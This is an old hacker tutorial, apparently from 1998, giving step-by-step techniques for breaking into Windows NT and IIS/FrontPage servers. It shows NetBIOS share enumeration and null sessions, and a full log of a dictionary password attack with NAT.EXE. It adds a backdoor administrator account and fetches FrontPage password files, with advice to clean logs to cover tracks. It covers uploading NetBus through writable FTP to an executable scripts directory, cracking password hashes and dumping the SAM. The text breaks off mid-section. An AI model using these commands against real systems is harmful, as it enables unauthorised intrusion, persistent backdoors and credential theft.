Windows NT Deconstruction Tatics Step by Step NT Explotation Techniques by vacuum of Rhino9 & Technotronic vacuum@technotronic.com Revision 5 10/01/98 Changes in Revision 5: Refined some NET.EXE examples. Included brief discussion of NetBus. Samba rdisk /s information. Made this .zip more like a unix rootkit by included all the mentioned tools. Cleaned up the overall layout. I. Initial Access Strategy 1.)NetBIOS Shares Using Microsoft Executables a. NET.EXE 's other uses 2.)NAT The NetBIOS Auditing Tool II.FrontPage Exploitation 1.)FrontPage password decryption on unix servers with frontpage extensions. III. Registry Vulnerabilities 1.) rdisk /s to dump the SAM (Security Account Manager) 2.) gaining access to the regisry with the AT.EXE command (local) 3.) REGEDT32.EXE and REGEDIT.EXE 4.) REGINI.EXE and REGDMP.EXE remote registry editing tools 5.) Using the Registry to Execute Malicious Code IV. Trojan .lnk (shortcuts) 1.)Security hole within winnt\profiles and login scripts V. Workarounds for common sytsem policy restrictions VI. PWDUMP Example Included Files: NTExploits.txt this document samproof.txt example of the sam hive from the registry notepad.reg Example .reg file that starts up notepad.exe upon login. Could be any executable. service.pwd Service.pwd frontpage password example. NetBIOS Shares Using the standard Microsoft Executables C:\>NBTSTAT -A 123.123.123.123 C:\>NBTSTAT -a www.target.com NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- STUDENT1 <20> UNIQUE Registered STUDENT1 <00> UNIQUE Registered DOMAIN1 <00> GROUP Registered DOMAIN1 <1C> GROUP Registered DOMAIN1 <1B> UNIQUE Registered STUDENT1 <03> UNIQUE Registered DOMAIN1 <1E> GROUP Registered DOMAIN1 <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered MAC Address = 00-C0-4F-C4-8C-9D After a NetBIOS share is found, it can be added to the LMHOSTS file. Computername <03> UNIQUE Registered by the messenger service. This is the computername to be added to the LMHOSTS file which is not necessary to use NAT.EXE but is necessary if you would like to view the remote computer in Network Neighborhood. Example of LMHOSTS file: 123.123.123.123 student1 24.3.9.12 target2 Now you can use the find computer options within NT or 95 to browse the shares. An alternative option would be to use the very powerful NET.EXE C:\>net view 123.123.123.123 C:\>net view \\student1 Shared resources at 123.123.123.123 Share name Type Used as Comment ------------------------------------------------------------------------------ NETLOGON Disk Logon server share Test Disk The command completed successfully. NOTE: The C$ ADMIN$ and IPC$ shares are hidden and are not shown. To connect to the ipc$ using a null session: C:\net use \\111.111.111.111\ipc$ "" /user:"" The command completed successfully. To connect to a normal share: C:\net use x: \\123.123.123.123\test The command completed successfully. Now the command prompt or the NT Explorer can be used to access the remote drive X: C:\net use New connections will be remembered. Status Local Remote Network ------------------------------------------------------------------------------- OK X: \\123.123.123.123\test Microsoft Windows Network OK \\123.123.123.123\test Microsoft Windows Network The command completed successfully. Here are some other interesting things that NET.EXE can be used for that are not related to NetBIOS. NET localgroup will show which groups have been created on the local machine. NET name will show you the name of the computer as well as who is logged in. NET accounts will show the password restrictions for the user. NET share displays the shares for the local machine including the $ shares which are supposed to be hidden. NET share unsecure=c:\ will share the c:\ as unsecure NET user will show you which accounts are created on the local machine. NET user unsecure elite /add will add user unsecure with a password of elite. NET start SERVICE. NET start schedule will start the schedule service which can be used to access the complete registry on a local machine. NET group NET group Administrators unsecure /add will add the user unsecure to the Administrators group if run on a Domain Controller. NAT (NetBIOS Auditing Tool) This technique works the the default share type everyone full control. If you are denied access, permissions have been applied to the share, and a password will be required. NAT.EXE (NetBIOS Auditing Tool) NAT.EXE [-o filename] [-u userlist] [-p passlist]
OPTIONS -o Specify the output file. All results from the scan will be written to the specified file, in addition to standard output. -u Specify the file to read usernames from. Usernames will be read from the specified file when attempt- ing to guess the password on the remote server. Usernames should appear one per line in the speci- fied file. -p Specify the file to read passwords from. Passwords will be read from the specified file when attempt- ing to guess the password on the remote server. Passwords should appear one per line in the speci- fied file.
Addresses should be specified in comma deliminated format, with no spaces. Valid address specifica- tions include: hostname - "hostname" is added 127.0.0.1-127.0.0.3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3, adds addresses 127.0.0.1 through 127.0.0.3 127.0.0.1-3,7,10-20, adds addresses 127.0.0.1 through 127.0.0.3, 127.0.0.7, 127.0.0.10 through 127.0.0.20. hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1 through 127.0.0.1 All combinations of hostnames and address ranges as specified above are valid. NAT.EXE does all of the above techniques plus it will try Administrative shares ($), scan a range of IP addresses and use a dictionary file to crack the NetBIOS passwords. NAT.EXE is the tool prefered by most hackers. C:\nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30 [*]--- Reading usernames from userlist.txt [*]--- Reading passwords from passlist.txt [*]--- Checking host: 204.73.131.11 [*]--- Obtaining list of remote NetBIOS names [*]--- Attempting to connect with name: * [*]--- Unable to connect [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03 [*]--- Server time is Mon Dec 01 07:44:34 1997 [*]--- Timezone is UTC-6.0 [*]--- Remote server wants us to encrypt, telling it not to [*]--- Attempting to connect with name: *SMBSERVER [*]--- CONNECTED with name: *SMBSERVER [*]--- Attempting to establish session [*]--- Was not able to establish session with no password [*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password' [*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password' [*]--- Obtained server information: Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[] [*]--- Obtained listing of shares: Sharename Type Comment --------- ---- ------- ADMIN$ Disk: Remote Admin C$ Disk: Default share IPC$ IPC: Remote IPC NETLOGON Disk: Logon server share Test Disk: [*]--- This machine has a browse list: Server Comment --------- ------- STUDENT1 [*]--- Attempting to access share: \\*SMBSERVER\ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$ [*]--- Checking write access in: \\*SMBSERVER\ADMIN$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$ [*]--- Attempting to access share: \\*SMBSERVER\C$ [*]--- WARNING: Able to access share: \\*SMBSERVER\C$ [*]--- Checking write access in: \\*SMBSERVER\C$ [*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$ [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$ [*]--- Attempting to access share: \\*SMBSERVER\NETLOGON [*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON [*]--- Checking write access in: \\*SMBSERVER\NETLOGON [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON [*]--- Attempting to access share: \\*SMBSERVER\Test [*]--- WARNING: Able to access share: \\*SMBSERVER\Test [*]--- Checking write access in: \\*SMBSERVER\Test [*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test [*]--- Attempting to access share: \\*SMBSERVER\D$ [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\ROOT [*]--- Unable to access [*]--- Attempting to access share: \\*SMBSERVER\WINNT$ [*]--- Unable to access If Default share of Everyone/Full Control. Done it is hacked. FrontPage Exploitation: Most frontpage exploits compromise only the wwwroot directory and can be used to change the html of a site which has become a popular method of gaining fame in the hacker community. The following is a list of the Internet Information server files location in relation to the local hard drive (C:) and the web (www.target.com) C:\InetPub\wwwroot C:\InetPub\scripts /Scripts C:\InetPub\wwwroot\_vti_bin /_vti_bin C:\InetPub\wwwroot\_vti_bin\_vti_adm /_vti_bin/_vti_adm C:\InetPub\wwwroot\_vti_bin\_vti_aut /_vti_bin/_vti_aut C:\InetPub\cgi-bin /cgi-bin C:\InetPub\wwwroot\srchadm /srchadm C:\WINNT\System32\inetserv\iisadmin /iisadmin C:\InetPub\wwwroot\_vti_pvt C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample C:\Program Files\Microsoft FrontPage\_vti_bin C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm /iisadmin/isadmin http://localhost:8814/iisadmin/iisnew.asp where 8814 is a randomly chosen port. By default only localhost (127.0.0.1) has access to the html version of Internet Server Mangager HTML Using FrontPage, a hacker may alter the html of a remote website often frontpage webs are left un-passworded. On the FrontPage Explorer's File menu, choose Open FrontPage Web. In the Getting Started dialog box, select Open an Existing FrontPage Web and choose the FrontPage web you want to open. Click More Webs if the web you want to open is not listed. Click OK. If you are prompted for your author name and password, you will have to decrypt service.pwd, guess or move on. Enter them in the Name and Password Required dialog box, and click OK. Alter the existing page, or upload a page of your own. Scanning PORT 80 (http) or 443 (https) options: GET /_vti_inf.html #Ensures that frontpage server extensions are installed. GET /_vti_pvt/service.pwd #Contains the encrypted password files. Not used on IIS and WebSite servers GET /_vti_pvt/authors.pwd #On Netscape servers only. Encrypted names and passwords of authors. GET /_vti_pvt/administrators.pwd GET /_vti_log/author.log #If author.log is there it will need to be cleaned to cover your tracks GET /samples/search/queryhit.htm Other ways of obtaining service.pwd http://ftpsearch.com/index.html search for service.pwd http://www.altavista.digital.com advanced search for link:"/_vti_pvt/service.pwd" Attempt to connect to the server using FTP. port 21 login anonymous password guest@unknown the anonymous login will use the internally created IISUSR_computername account to assign NT permissions. An incorrect configuration may leave areas vulnerable to attack. If you find a writeable anonymous ftp account, copy any executables (Netbus for example) to the c:\inetpub\scripts\ directory. The permissions on the scripts directory are as follows: Execute (including script). This is valuable, allowing you to http://www.target.com/scripts/patch.exe If service.pwd is obtained it will look similar to this: Vacuum:SGXJVl6OJ9zkE The above password is apple Turn it into DES format: Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash The run your favorite unix password cracker like john.exe (John The Ripper) against a large dictionary file or ntucrack.exe which will brute force crack the password. Registry Vulnerabilities: RDISK rdisk /s will dump the security and sam portions of the registry into c:\winnt\repair directory. It will also give you the option of creating an emergency repair diskette. This .zip includes SAMDUMP.EXE which can be used to extract passwords from emergency repair diskettes. Within that directory there will be a sam._ file. It is ethically used for the emergency repair disk. If you have gained access to the local drive through physical access or through netbios shares, run rdisk /s There is a utility called SAMDUP included within this .zip that will extract the passwords. GAINING ACCESS TO THE ENTIRE REGISTRY (Local) For this to work, you will need to start the schedule service. From the Command Prompt: C:\>net start schedule The Schedule service is starting. The Schedule service was started successfully. From a Command Prompt: at